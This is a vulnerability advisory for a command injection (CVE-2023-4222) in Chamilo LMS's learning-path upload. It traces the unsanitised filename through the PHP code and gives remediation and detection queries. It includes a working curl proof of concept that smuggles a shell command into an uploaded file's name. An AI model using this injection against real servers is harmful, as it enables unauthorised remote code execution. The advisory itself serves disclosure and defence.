Product | Chamilo |
---|---|
Vendor | Chamilo |
Severity | High - Adversaries may exploit software vulnerabilities to obtain unauthenticated remote code execution. |
Affected Versions | <= v1.11.24 |
Tested Versions | v1.11.24 (latest version as of writing) |
CVE Identifier | CVE-2023-4222 |
CVE Description | Command injection in main/lp/openoffice_text_document.class.php in Chamilo LMS <= v1.11.24 allows users permitted to upload Learning Paths to obtain remote code execution via improper neutralisation of special characters. |
CWE Classification(s) | CWE-78: Improper Neutralization of Special Elements used in an OS Command |
CAPEC Classification(s) | CAPEC-88 OS Command Injection |
Base Score: 7.2 (High)
Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:N/C:H/I:H/A:H
Metric | Value |
---|---|
Attack Vector (AV) | Network |
Attack Complexity (AC) | Low |
Privileges Required (PR) | High |
User Interaction (UI) | None |
Scope (S) | Unchanged |
Confidentiality (C) | High |
Integrity (I) | High |
Availability (A) | High |
Chamilo is an open-source PHP-based Learning Management System (LMS) that facilitates online education and training. It offers features such as course creation, content management, assessments, collaboration and delivering educational resources.
There are two command injection vulnerabilities manifesting in main/lp/openoffice_presentation.class.php
(CVE-2023-4221) and main/lp/openoffice_text_document.class.php
(CVE-2023-4222), which appears to be variants of CVE-2023-34960 (unauthenticated command injection in main/webservices/additional_webservices.php
). Consequently, attackers with permissions to upload learning paths may exploit the vulnerability to gain remote code execution.
Note: This advisory details the second command injection vulnerability in main/lp/openoffice_text_document.class.php
(CVE-2023-4222). The advisory for the first command injection vulnerability in main/lp/openoffice_presentation.class.php
(CVE-2023-4221) can be found here.
The relevant code from main/lp/lp_upload.php
is shown below:
...
elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && count($_FILES) > 0 && !empty($_FILES['user_file']['name'])) {
// A file upload has been detected, now deal with the file...
// Directory creation.
$stopping_error = false;
$s = $_FILES['user_file']['name'];
// Get name of the zip file without the extension.
$info = pathinfo($s);
$filename = $info['basename'];
$extension = $info['extension'];
$file_base_name = str_replace('.'.$extension, '', $filename);
$new_dir = api_replace_dangerous_char(trim($file_base_name));
$type = learnpath::getPackageType($_FILES['user_file']['tmp_name'], $_FILES['user_file']['name']); // [1]
...
switch ($type) {
...
case 'oogie':
require_once 'openoffice_presentation.class.php';
$take_slide_name = empty($_POST['take_slide_name']) ? false : true;
$o_ppt = new OpenofficePresentation($take_slide_name);
$first_item_id = $o_ppt->convert_document($_FILES['user_file'], 'make_lp', $_POST['slide_size']); // [2]
Display::addFlash(Display::return_message(get_lang('UplUploadSucceeded')));
break;
case 'woogie':
require_once 'openoffice_text.class.php';
$split_steps = (empty($_POST['split_steps']) || $_POST['split_steps'] == 'per_page') ? 'per_page' : 'per_chapter';
$o_doc = new OpenofficeText($split_steps);
$first_item_id = $o_doc->convert_document($_FILES['user_file']); // [3]
Display::addFlash(Display::return_message(get_lang('UplUploadSucceeded')));
break;
...
}
}
...
At [1], learnpath::getPackageType()
is invoked to determine if oogie
or woogie
should be used for processing the uploaded file:
class learnpath
{
...
public static function getPackageType($file_path, $file_name)
{
// Get name of the zip file without the extension.
$file_info = pathinfo($file_name);
$extension = $file_info['extension']; // Extension only.
if (!empty($_POST['ppt2lp']) && !in_array(strtolower($extension), [
'dll',
'exe',
])) {
return 'oogie';
}
if (!empty($_POST['woogie']) && !in_array(strtolower($extension), [
'dll',
'exe',
])) {
return 'woogie';
}
...
}
...
}
Observe that so long as the uploaded file extension does not match dll
or exe
, supplying a non-empty ppt2lp
or woogie
POST parameter allows reaching of the respective code paths.
Subsequently, the code will flow to either [2] and [3] where command injection occurs. Note that [3] leads to the second command injection vulnerability (presented in this advisory), and [2] leads to a first command injection (CVE-2023-4221).
At [3], OpenofficeTextDocument::convert_document()
is invoked. Since OpenofficeTextDocument
extends from OpenofficeDocument
, OpenofficeDocument::convert_document()
is invoked in absence of an overriden function within the OpenofficeTextDocument
class too. At [5], add_command_parameters()
of the subclass is invoked. The implementation of OpenofficeTextDocument::add_command_parameters()
is shown below:
public function add_command_parameters()
{
return ' -d woogie "'.$this->base_work_dir.'/'.$this->file_path.'" "'.$this->base_work_dir.$this->created_dir.'/'.$this->file_name.'.html"';
}
Notice that $this->file_name
is used to construct the command to be executed here. Backtracking to the implementation of OpenofficeDocument::convert_document()
, it can be seen that $this->filename
is set using the uploaded file’s name:
public function convert_document($file, $action_after_conversion = 'make_lp', $size = null)
{
$_course = api_get_course_info();
$this->file_name = pathinfo($file['name'], PATHINFO_FILENAME);
...
}
Observe that no sanitisation is performed on the $file['name']
. Since $_FILES['user_file']
is passed as the $file
argument, it is possible to upload a file containing the command injection payload in its filename.
The following exploit conditions are identified for successful execution of this exploit scenario reliably:
service_ppt2lp
API configuration option must be set to localhost
.http://<chamilo>/main/admin/configure_extensions.php?display=ppt2lp
) is enabled and that the host
is set to localhost
.ch_sid
session cookie.test
and navigate to http://<chamilo>/courses/TEST/
.$ curl -b 'ch_sid=<ch_sid_value>' -F "user_file=@$(mktemp);filename='$(id > /tmp/rce)'" -F 'woogie=y' 'http://<chamilo>/main/lp/lp_upload.php'
/tmp/rce
is created on the target server with the id
shell command output as the file contents.It is recommended to use escapeshellarg()
to properly escape user-input used to construct shell commands.
End users are encouraged to update to the latest version of Chamilo.
It is possible to detect the exploitation of this vulnerability by checking the server’s access logs for all requests made to:
/main/lp/lp_upload.php
/main/lp/lp_controller.php
/main/upload/upload_ppt.php
/main/upload/upload_upload.php
/main/upload/upload.scorm.php
Successful exploitation of this vulnerability requiresa non-empty woogie
POST parameter and the command injection payload to be placed within the filename of the user_file
uploaded.
This vulnerability can be detected more accurately by performing investigation of database logs, as the filename is stored in the database. For example, the following SQL query may be used to flag suspicious learning path uploads as potential exploit attempts:
SELECT * FROM c_document
WHERE path LIKE '/learning_path/%'
AND NOT regexp_replace(title, '[a-z0-9 ._-]+', '') = ''
Ngo Wei Lin (@Creastery) of STAR Labs SG Pte. Ltd. (@starlabs_sg)